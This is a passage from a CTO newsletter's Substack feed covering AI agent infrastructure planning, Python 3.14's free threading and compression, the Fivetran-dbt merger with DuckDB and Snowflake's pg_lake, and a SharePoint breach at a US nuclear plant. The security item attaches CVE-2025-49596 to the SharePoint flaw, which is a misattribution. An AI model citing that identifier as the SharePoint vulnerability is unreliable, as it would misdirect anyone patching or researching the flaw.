&lt;X,requirehumanapproval&gt;X, require human approval &gt; X,requirehumanapproval&gt;X), (2) rate limits per agent per time window, (3) automatic rollback for failed actions, (4) manual kill switch accessible to ops team. <strong>Deliverable</strong>: Code PR implementing circuit breaker middleware, runbook for ops team on how to kill rogue agents, test results showing rollback works.</p></li><li><p><strong>Create Agent Discovery Manifest: (MEDIUM PRIORITY - 60 days)<br></strong> For each application feature you want agents to invoke, publish a machine-readable manifest: endpoint URL, required parameters with types, permission scopes needed, expected response format, example requests. Format: API spec + permission matrix. <strong>Deliverable</strong>: /agent-manifest.json endpoint serving your app&#8217;s capabilities, test showing Windows Copilot or Claude can parse and invoke your API.</p></li><li><p><strong>Audit Agent Runtime Compatibility: (MEDIUM PRIORITY - 60 days)<br></strong> Test your agents across target runtimes (Windows Copilot, Apple Intelligence, Atlas, web browsers). <strong>Document:</strong> which features work, which degrade, which fail completely. Create compatibility matrix. <strong>Deliverable</strong>: Test suite running agents in each target environment, spreadsheet showing feature parity across runtimes, prioritized backlog of compatibility fixes.</p></li><li><p><strong>Run Build-vs-Buy Analysis for Vertical AI: (MEDIUM PRIORITY - 60 days)<br> </strong>If you&#8217;re in finance, legal, accounting, or consulting, research vendor offerings targeting your vertical (OpenAI Mercury for banking, Harvey for legal, etc.). <strong>Document</strong>: vendor capabilities, pricing, data residency requirements, differentiation risk if competitors use same tool. <strong>Deliverable</strong>: Decision memo with recommendation (build in-house vs adopt vendor solution) backed by total cost of ownership analysis.</p></li><li><p><strong>Establish Agent Testing Pipeline: (MEDIUM PRIORITY - 60 days)</strong><br> Create automated test suite for agents covering: permission boundary violations (can agent access data it shouldn&#8217;t?), failure mode handling (what happens when API is down?), degraded functionality (does agent fallback gracefully?). Run in CI before any agent deployment. <strong>Deliverable</strong>: Test suite with minimum 80% coverage of agent code paths, CI integration blocking deploys on test failures, weekly test report showing agent behavior stability.</p></li></ul><h5><strong>ROI Calculator - Knowledge Work Automation Risk:</strong></h5><ul><li><p>Junior IB analyst comp: $200K base + benefits = $250K per FTE</p></li><li><p>Typical analyst output: 15-20 models/decks monthly (high vol) </p></li><li><p>Project Mercury automation: 40-60% workflow reduction</p></li><li><p>Displaced headcount: 2-3 junior FTEs per senior banker</p></li><li><p>Cost impact: $500-750K annual savings per senior banker team</p></li><li><p>Your organization: How many high-value repetitive workflows exist? Multiply by potential 40-60% automation to estimate exposure</p></li></ul><h5><strong>Technical Specs: Agent Skills (Anthropic, Oct 2025)</strong></h5><ul><li><p><strong>Progressive Disclosure Architecture</strong>: 3-tier lazy loading (YAML frontmatter preload &#8594; on-demand SKILL.md read via bash tool &#8594; conditional linked file fetch); context window overhead: 50-200 tokens per skill metadata vs 2K-10K full load; filesystem-based discovery eliminates hard context limits; skill triggering via read operation creates immutable load timestamps</p></li><li><p><strong>Reproducible Decision Paths</strong>: Git-trackable skill directories; deterministic Python/bash script execution bypasses token generation for sorting/parsing ops (10-100x latency reduction); SKILL.md &#8594; executable docs with semantic versioning; diff-able instruction changes enable A/B testing of agent behavior</p></li><li><p><strong>Platform-Agnostic Runtime</strong>: Cross-environment portability (local fs, Claude.ai storage, API mounts); no vendor lock-in: skills are markdown + code, not proprietary format; separates LLM reasoning layer from execution layer (Python subprocess calls); compatible with MCP server integration for external tool access</p></li><li><p><strong>Iterative Failure Prevention</strong>: Post-execution skill mutation&#8212;agents rewrite SKILL.md based on trajectory analysis; failure patterns codified as negative examples in skill context; zero-shot transfer of learned behaviors across sessions; eliminates need for separate fine-tuning or RLHF for domain adaptation</p></li></ul><h3>Bottom Line</h3><p>The central tension between peak data abundance (exemplified by Archive&#8217;s trillion pages) and system fragility (worst AWS outage ever) forces a bifurcated architectural choice: either Microsoft&#8217;s Agentic Substrate where AI acts as an OS service of <em>delegation</em> to manage fragility, or Apple&#8217;s On-Device Integrity to achieve a local, non-brittle solution aimed at avoiding the dark cloud. The true commercial battleground, however, is being staked out by OpenAI, which aims to control both the user&#8217;s primary assembly point for reality (the Atlas viewport) and become the most precise automation engine for high-value workflows (Project Mercury). The winners in this revolution will be those who control these execution chokepoints, reliably orchestrating human intent regardless of which underlying thesis prevails. </p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="/__u/ctolunchnyc.substack.com/subscribe"><span>Subscribe now</span></a></p><h2>&#128013; Python Sheds Its Skin</h2><p>Python 3.14 landed with features that sound like big wins: built-in Zstandard compression, significant improvements to the typing module, and official support for PEP 703 (no GIL), experimentally introduced in 3.13. The inclusion of Zstandard is an immediate, practical win for cost savings and latency. For CTOs with data pipelines that move terabytes daily, an instant 10x speedup and 3.3x smaller files compared to gzip is long overdue. But let&#8217;s be honest: Python is arriving fashionably late to a party Go and Rust attended years ago, and it&#8217;s acting like it invented the hors d&#8217;oeuvres. </p><p>Free-threaded Python is a tectonic shift. While this feature was an optional build in Python 3.13, the RIP GIL moment is no longer experimental as of 3.14. And while we&#8217;d love free-threaded execution to be a celebration of real, multi-core concurrency, truth be told, it&#8217;s more of a warning about ecosystem fragmentation. Of the top 360 most-downloaded PyPI packages with C extensions (the ones that matter for performance), only 128 (35%) support free-threaded wheels. You can compile and run <code>python3.14t</code> today, but if your critical dependencies don&#8217;t support it, you&#8217;re back in GIL-land anyway, without concurrency. At least the experiment is over. </p><blockquote><p>NB. If you import a single C extension module (eg. pinned to older version) <em>not</em> marked as thread-safe, the interpreter <strong>re-enables the GIL for the entire process.</strong></p></blockquote><p>This ecosystem gap reveals the core conflict: Python is simultaneously dominant (ML, data pipelines) and stagnant (concurrency, modern typing). The language has modern syntax like async/await and match statements, and continues to make incremental type progress with improvements to the typing module in 3.14. Major projects use strict MyPy enforcement. But as one CTO put it: &#8220;Type annotations in Python still feel like mere suggestions.&#8221; </p><p>This connects directly to our &#8220;types as AI infrastructure&#8221; thesis. TypeScript treats types as contracts enforced at compile time. Python treats types as documentation enforced at runtime (if you remember to add validation.) For human developers, this is an annoyance. For AI agents generating code, it&#8217;s catastrophic. An agent can confidently generate thousands of lines of code that pass static checks, integrate across multiple services, only to explode in production, a level of failure no CTO,  enterprise or not, can tolerate. (Or unit test can predict.) The philosophy of Python (&#8221;we trust the developer&#8221;) breaks down when the developer is a confidently hallucinating AI. The modern app stack is converging to provide end-to-end type safety as infrastructure for AI development. The fact that Mastra was <em>explicitly</em> created in TypeScript because its founders couldn&#8217;t build reliable, type-safe, event-driven agents in Python speaks volumes. </p><blockquote><p>Not &#8220;taking sides&#8221; here but JTN: Python lets agents confidently hallucinate across your production stack, TypeScript forces them to prove every step before deployment. For a CTO, that&#8217;s the difference between a minor bug and a multi-service outage that costs millions. (Spoiler: use them together.) </p></blockquote><p>In a odd coda to all this, the Python Software Foundation declined a $1.5M NSF grant over ideological disagreements regarding its DEI requirements. The grant included language requiring recipients to not operate programs that adhere to specific DEI ideologies, which the foundation was not inclined to comply with. The lesson for CTOs isn&#8217;t about the policy; it&#8217;s about community governance. Python&#8217;s strength is its independence, but that independence can ofc be a liability when it comes to funding long-term development. If a community can&#8217;t agree on basic financial decisions, what happens when it needs to make high-stakes, technical architecture decisions to keep up with the competition? Python declined $1.5M because no one could agree on the indentation rules for morality; a billion lines of code later: still arguing about whitespace. &#128374;&#65039;</p><h3>Bottom Line</h3><p>Python has long been the language of AI development, but its community-governed evolution creates a structural contrast with patron-backed languages like TypeScript. (Or Rust, where platinum corporate sponsors get board votes.)  This isn&#8217;t about technical quality, both languages remain critical to the modern agentic stack, but about the operational imperative to upgrade, and acceleration.</p><p>TypeScript&#8217;s corporate backing (Microsoft, Google, and others) creates business-critical dependencies on its evolution. Features like compile-time type safety aren&#8217;t optional niceties; they&#8217;re infrastructure requirements that prevent catastrophic failures at scale. For teams building on AI-native SDLCs, staying current with TypeScript isn&#8217;t a choice, it&#8217;s a competitive necessity baked into the development process itself.</p><p>Python&#8217;s community governance model, by contrast, means beneficial features land when the ecosystem supports them, not when business timelines demand it. Data science teams upgrade when convenient because Python&#8217;s evolution, while valuable, rarely creates the same structural imperative. The language&#8217;s principled independence, including its selective approach to funding, preserves autonomy but shifts the burden of maintaining competitive advantage onto individual organizations rather than embedding it in the language&#8217;s evolutionary trajectory.</p><blockquote><p>Upgrading Python to 3.14 is exciting in theory, but for real-world, agentic pipelines, the practical gains are largely symbolic.</p></blockquote><p>Python 3.14&#8217;s headline features, GIL removal, Zstandard compression, improved typing, illustrate this perfectly. They&#8217;re technically interesting but deliver minimal practical gains. The GIL removal promises true multi-core concurrency, yet is largely unsupported. Zstandard compression might save $1,000 annually for a workflow transferring 1GB daily on AWS but that&#8217;s hardly enough to break out a ROI calculator, let alone drive urgent migration. Though that does scale linearly, so figure $100K savings for 100GB/day (while updating Docker images, validating CI/CD pipelines, and running compatibility checks for somewhat marginal infrastructure gains.)</p><blockquote><p>While Python 3.14 may or may not give you any appreciable savings on your AWS bill (depending on your data usage), it can definitely be helpful in places where you&#8217;re running into rate limits set by Enforced Network Bandwidth Quotas. In which case cutting your guest traffic down to 1/3 of what it was looks pretty good. </p></blockquote><p>But apart from catching up to features found in other languages for some time, there&#8217;s little to no business imperative to upgrade, which may echo why organizations lingered on deprecated Python 2.7 for over a decade. This stands in stark contrast to the modern agentic app stack, where corporate patronage (eg., as noted, Rust Foundation corporate sponsors have votes on the board while Python foundation corporate sponsors do not) and powerful structural incentives create existential pressure: stay current or fall catastrophically behind.  Python, for all its capabilities, just doesn&#8217;t operate on that clock. </p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="/__u/ctolunchnyc.substack.com/subscribe"><span>Subscribe now</span></a></p><h2>RIP The Modern Data Stack</h2><p><strong>The Modern Data Stack either died or collapsed into itself this month</strong>, depending on whether you&#8217;re counting bodies or market caps. Fivetran and dbt are merging in an all-stock deal estimated at potentially over $10 billion, combining Fivetran&#8217;s 500-600M ARR against $5.6B valuation with dbt&#8217;s 100M ARR against $4.2B valuation. Supabase acquired Triplit, an offline-first database, continuing their quiet march toward becoming the full-stack infrastructure platform for developers who hate AWS.  But the Fivetran-dbt merger is the story that matters, because it&#8217;s either the final consolidation of the Modern Data Stack or its death certificate.</p><h4>The Inevitable Vertical Integration</h4><p>Ingestion and transformation were always going to consolidate. The only question was which would absorb which. Turns out when one company has 5x the revenue of the other, the answer is generally straightforward. Previously, Fivetran acquired Census (reverse-ETL) and Tobiko (SQLMesh, a dbt alternative). Now they&#8217;re combining with dbt itself, creating a vertically integrated data pipeline platform that controls everything from source extraction to warehouse transformation. Is this <em>&#129419; </em>synergy, or a monopoly formation with better PR?</p><p>For CTOs evolving your company&#8217;s DataOps, this means SQLMesh is almost certainly dead. They won&#8217;t kill it outright, that would alienate the existing user base and trigger antitrust scrutiny, but expect them to stop adding features, making a switch to dbt not just necessary to keep up with data stack evolution but potentially an easier migration <em>using Fivetran&#8217;s tooling</em>. Classic acqui-kill playbook: inherit the users, sunset the product, convert them to the winner. Here we are again. </p><p>The other question is what happens to dbt-core (the open-source version) versus dbt Fusion (the commercial product). Fivetran has every incentive to push users toward the commercial version, which means dbt-core will either stay frozen at its current feature set or get &#8220;community-driven development&#8221; (read: slow death by benign neglect, another playbook classic.) <em>If you&#8217;re building on dbt-core, start planning your migration strategy now before the decision gets made for you.</em></p><h4>Snowflake&#8217;s pg_lake Counterplay</h4><p>The same month as the Fivetran-dbt announcement, Snowflake released <strong>pg_lake</strong>: Postgres-compatible lakehouse formats. Not a coincidence. Fivetran-dbt consolidates the transformation layer. Snowflake&#8217;s pg_lake attacks the storage layer by making Postgres compatible with lakehouse formats (Iceberg, Delta, Hudi). The battle being fought: who owns the SQL interface? Fivetran-dbt wants to own the transformation SQL that runs in your warehouse. Snowflake wants to own the storage SQL that defines what a warehouse <em>is</em>.</p><p>If Postgres becomes the universal interface for lakehouse formats, Snowflake&#8217;s proprietary warehouse becomes one option among many rather than the default. Making Postgres compatibility a first-class feature is their hedge against commoditization. The subtext is clear: Snowflake sees the writing on the wall and is trying to stay relevant in a world where open formats (Iceberg, Parquet) eat proprietary warehouses.</p><h4>DuckDB: The Quiet Assassin</h4><p>While everyone&#8217;s watching the Fivetran-dbt merger, DuckDB is quietly tryna make the entire Modern Data Stack obsolete. Not through acquisition or market consolidation, but by solving the problem so elegantly that the stack becomes unnecessary.</p><p>DuckDB is an embedded analytical database that runs in-process. No server. No network calls. No connection pools. Just a library you import that can query Parquet files on S3, CSV files on disk, or Pandas DataFrames in memory, all using standard SQL. It&#8217;s SQLite for analytics, and it&#8217;s faster than most data warehouses for queries under 100GB.</p><p>The implications are staggering. The Modern Data Stack assumes you need:</p><ul><li><p>Fivetran to ingest data into a warehouse</p></li><li><p>dbt to transform data inside that warehouse</p></li><li><p>Snowflake/Databricks to store and query that data</p></li><li><p>A BI tool to visualize it</p></li></ul><p>DuckDB says: what if you just query the files directly? Parquet on S3 is already columnar and compressed. Why copy it into a proprietary warehouse format? Just point DuckDB at the bucket and write SQL. Transformations? Run them in DuckDB and write the results back to S3 as Parquet. Visualization? Connect your BI tool directly to DuckDB or use Jupyter notebooks.</p><p><strong>The cost differential is obscene.</strong> A Snowflake query that costs $10 in compute might cost $0.02 in S3 data transfer with DuckDB. You&#8217;re paying 500x for the privilege of having your data in someone else&#8217;s proprietary format.</p><h4>The Three-Way Battle for SQL&#8217;s Soul</h4><p><strong>Fivetran-dbt</strong> wants to own the transformation layer. They control how data moves and how it gets transformed, but they&#8217;re agnostic about where it lives. Their bet: the transformation logic is the moat, and they can charge rent on every pipeline regardless of the underlying warehouse.</p><p><strong>Snowflake&#8217;s pg_lake</strong> attacks the storage layer by making Postgres compatible with lakehouse formats (Iceberg, Delta, Hudi). Their bet: if Postgres becomes the universal interface for lakehouse formats, Snowflake&#8217;s proprietary warehouse becomes one option among many. Making Postgres compatibility a first-class feature is their hedge against commoditization.</p><p><strong>DuckDB</strong> is the anarchist in the room saying: why do you need any of them? Just use open formats (Parquet, Iceberg), store them cheaply (S3, GCS), and query them directly. No vendor lock-in. No data movement. No rent-seeking middlemen. </p><p>The battle being fought: who owns the SQL interface? Fivetran-dbt wants to own the transformation SQL. Snowflake wants to own the storage SQL. DuckDB wants to make the question irrelevant by making SQL so cheap and portable that vendor choice stops mattering.</p><h4>Is the Modern Data Stack Actually Dead?</h4><p>The Modern Data Stack narrative always had a problem: it assumed that data engineering was a separate discipline from software engineering. Fivetran for ingestion, dbt for transformation, Snowflake/Databricks for warehousing, Looker/Tableau for BI. Each layer had its own vendors, its own tooling, its own pricing model. The result was a Rube Goldberg machine where moving data from      A to B required six vendors, four different teams and at least three coffee runs.</p><p>The consolidation is inevitable. Supabase acquired Triplit because they realized offline-first databases are the future of edge computing. Fivetran merged with dbt because charging separately for ingestion and transformation was leaving money on the table. Airbyte (which raised $150M at $1.5B in 2023) is watching nervously and trying to figure out if they&#8217;re next or if they can survive as the &#8220;open-source alternative.&#8221;</p><p>The real winner here is SQL. Not Spark SQL, not Presto SQL, not proprietary query languages, just SQL. The Modern Data Stack was always a bet that SQL is the universal interface for data operations, and the consolidation is proving it right. Every tool in the stack compiles down to SQL in the warehouse. The vendors are just fighting over who gets to generate that SQL and collect the rent.</p><h4><strong>Is the Modern Data Stack being displaced by observability?</strong></h4><p>But there&#8217;s a darker reading, and it&#8217;s the one that should concern you more: is the Modern Data Stack being displaced by observability? The 360&#176; view of data used to require a data warehouse, a transformation layer, and a BI tool. Now it requires an observability platform that captures data at ingestion, indexes it in real time, and surfaces insights without transformation. Datadog, New Relic, and Splunk are eating the MDS from below by making data warehouses feel slow and expensive. (While DuckDB is also gaining traction as a backend for log and observability data analysis.) </p><p>The shift is subtle but real: companies are moving from &#8220;store everything and query later&#8221; to &#8220;stream everything and filter in real time.&#8221; The Modern Data Stack was built for batch processing. Observability 2.0 is built for real-time. The batch world is shrinking, and the vendors who can&#8217;t move to streaming are about to get consolidated into irrelevance. And we all know how that story ends. </p><p>The Modern Data Stack assumed data engineering was a separate discipline requiring specialized tools distinct from software engineering workflows. But as data volumes increased and latency requirements tightened, the batch-processing paradigm showed its limits. Why store data in a warehouse, transform it overnight, and query it in the morning when you could stream it, transform it in-flight, and query it in real time?</p><p>The consolidation reveals two competing futures: <strong>fully integrated platforms</strong> (Supabase for transactional, Databricks for analytical) or <strong>composable open-source tooling</strong> (Airbyte, dbt-core, DuckDB) with no middle ground. The vendors charging rent for the middle are running out of road.</p><h3>Industry Impact</h3><p>Snowflake&#8217;s pg_lake is a defensive move. If Postgres becomes the universal interface for lakehouse formats, Snowflake&#8217;s proprietary warehouse becomes one option among many rather than the default. Making Postgres compatibility a first-class feature is their hedge against commoditization; an admission that even Snowflake sees the open-format future coming.</p><p>This consolidation is a signal that the MDS was always a transitional architecture. The future is either fully integrated platforms (Supabase for transactional, Databricks for analytical) or composable open-source tooling (Airbyte, dbt-core, DuckDB), with no middle ground. Vendors charging rent for the glue between systems are being squeezed from both sides.</p><h4>What This Means for CTOs</h4><p>For CTOs running Modern Data Stack implementations, this creates immediate planning pressure. If you&#8217;re running SQLMesh, start planning your migration to dbt now. The announcement will come eventually, but waiting for it just compresses your timeline. If you&#8217;re evaluating data pipeline solutions, assume Fivetran-dbt is the default and ask why you should fragment your tooling. But the bigger question is whether you need a Modern Data Stack at all. If observability platforms plus a lakehouse (Databricks, Iceberg, DuckDB) gets you 80% of the value at 30% of the cost, why maintain the additional complexity? </p><h3>CTO Playbook: 30/60/90 (Modern Data Stack)</h3><ul><li><p><strong>DuckDB Proof-of-Concept (HIGH PRIORITY - 30 days):</strong> Identify one analytical workload currently running in Snowflake/Databricks with &lt;100GB working set. Reimplement using DuckDB querying Parquet on S3/GCS. <strong>Measure</strong>: query latency, cost per query, data transfer costs, developer time to implement. <strong>Deliverable</strong>: Side-by-side cost comparison showing actual spend (warehouse credits vs S3 access), performance benchmarks on representative queries, decision memo on whether to expand DuckDB usage.</p></li><li><p><strong>Lakehouse Format Migration Assessment (HIGH PRIORITY - 30 days):</strong> Audit current data storage: percentage in proprietary warehouse formats vs open formats (Parquet, Iceberg, Delta). For data still in proprietary formats, document: migration cost, downstream breaking changes, vendor lock-in risk if pricing increases 2x. <strong>Deliverable</strong>: Migration plan with ROI calculation (cost to migrate vs cost savings from open formats), prioritized backlog of tables to convert, break-even timeline.</p></li><li><p><strong>Real-Time vs Batch Architecture Decision (MEDIUM PRIORITY - EOY):</strong> Map all analytical workloads to latency requirements: can decisions wait for overnight batch (MDS), need hour-level freshness (streaming + lakehouse), or require sub-minute visibility (observability platforms). Document which workloads are mis-architected (using expensive real-time infrastructure for batch-suitable queries or vice versa). <strong>Deliverable</strong>: Architecture decision matrix, cost optimization opportunities, timeline for right-sizing infrastructure per workload.</p></li><li><p><strong>SQLMesh Deprecation Plan (MEDIUM PRIORITY - EOY):</strong> If running SQLMesh, create migration roadmap to dbt with: (1) automated conversion tooling for existing transforms, (2) parallel run period (both systems operating, validating output parity), (3) cutover criteria and rollback plan. If not on SQLMesh, document strategy if Fivetran sunsets other acquired tools (Census, Tobiko). <strong>Deliverable</strong>: Migration project plan with resource requirements, compatibility test results, stakeholder sign-off on timeline.</p></li><li><p><strong>Vendor Concentration Risk Analysis (LOW PRIORITY - 90 days):</strong> Calculate percentage of data infrastructure spend going to single vendor (Snowflake, Databricks, Fivetran-dbt post-merger). If &gt;40% with one vendor, document: alternatives with equivalent capabilities, cost to migrate, negotiation leverage. For Fivetran-dbt specifically, assess whether vertical integration creates pricing power that eliminates competitive pressure. <strong>Deliverable</strong>: Vendor risk scorecard, negotiation strategy for next renewal, multi-vendor architecture options if current concentration is unsustainable.</p></li></ul><h2>Risk, Security &amp; Compliance</h2><p>Following up on <a href="/__u/ctolunchnyc.substack.com/i/170335225/sharepoint-critical-security-breach">August&#8217;s SharePoint hack</a> for anyone who doubted its criticality: <strong>foreign hackers breached a US nuclear weapons plant via SharePoint flaws.</strong> </p><blockquote><p>The CVE-2025-49596 remote code execution vulnerability that Microsoft initially described as &#8220;moderate severity&#8221; just compromised classified national security infrastructure.</p></blockquote><p>This isn&#8217;t the usual &#8220;patch your systems&#8221; reminder. It&#8217;s serving notice that &#8220;your entire threat model is wrong.&#8221;  The attack chain went: SharePoint vulnerability &#8594; network pivot &#8594; exfiltration of sensitive data from a facility that processes nuclear materials. The vulnerability was exploited in the wild for months before the breach was detected. Microsoft&#8217;s response was to issue a patch and move on. No acknowledgment of the offshore engineering team that maintains SharePoint on-prem. No explanation of how a &#8220;moderate severity&#8221; bug became a nation-state attack vector.</p><p>For CTOs, the lesson is blunt: SaaS vendor security ratings are theater. Microsoft has SOC 2, FedRAMP, every compliance cert you can name. <em><strong>They still shipped a vulnerability that compromised a nuclear weapons facility.</strong></em> The next time a vendor shows you their security questionnaire, remember that compliance certifications are about covering liability, not preventing breaches. The modern threat model assumes your vendors are compromised, your supply chain is hostile, and your perimeter doesn&#8217;t exist. When we say zero trust architecture, we mean it. </p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="/__u/ctolunchnyc.substack.com/subscribe"><span>Subscribe now</span></a></p><h2>At The Agentic Threshold</h2><p><strong>This month revealed the infrastructure gaps we&#8217;re carrying into the agentic era.</strong> We&#8217;re building systems capable of infinite accumulation but incapable of graceful failure (let alone nation state attack.) That mostly worked when systems retrieved information. It&#8217;s catastrophic when systems take action. The other side of this is agentic projects that get canceled not because the technology doesn&#8217;t work but because the organizations didn&#8217;t architect for the reality that autonomous agents require fundamentally different infrastructure patterns than conversational AI. Stateless pipelines versus stateful runtimes. Compile-time safety versus runtime suggestions. Platform-integrated agents versus browser-based distribution. Growing up is hard. </p><p>The companies pulling ahead are the ones that recognized this early and made hard architectural choices: one pattern per use case, observable agent behavior as infrastructure, graceful degradation by default. The companies falling behind are still treating agents as &#8220;ChatGPT with API access&#8221; and wondering why their pilots can&#8217;t graduate to production.</p><p>We&#8217;re not <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-september-2025#:~:text=This%20is%20what%20happens%20when%20an%20industry%20becomes%20too%20big%20to%20fail%20before%20it%20figures%20out%20how%20to%20succeed.">growing too fast</a>, we&#8217;re growing without the architectural foundation to support what we&#8217;re building. The next year will separate organizations that understand this from those that don&#8217;t. Your infrastructure decisions today determine whether you&#8217;re automating the future or writing postmortems about why an agent took down production.</p><p>Choose wisely. Execute efficaciously. </p><p></p><p>Forest Mars<br>CTO Lunch NYC</p><p><em>*To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p><div><hr></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Thanks for reading! Subscribe for free to receive new posts and support my work.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><div><hr></div><h2><br></h2>]]></content:encoded></item><item><title><![CDATA[The Engineering Guide to Control Plane Independence]]></title><description><![CDATA[Part 2 of Don't Lose Sleep Over It: Your Technical Remediation Playbook]]></description><link>https://ctolunchnyc.substack.com/p/the-engineering-guide-to-control</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-engineering-guide-to-control</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Fri, 31 Oct 2025 12:33:15 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/840b3775-d08d-4098-9e4f-5ffd76f1dbe6_747x433.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!Nog9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!Nog9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg" width="747" height="433" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:433,&quot;width&quot;:747,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:67325,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/177417369?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!Nog9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0b896aa1-af1a-4156-9464-8498ce5116cd_747x433.jpeg 1456w" 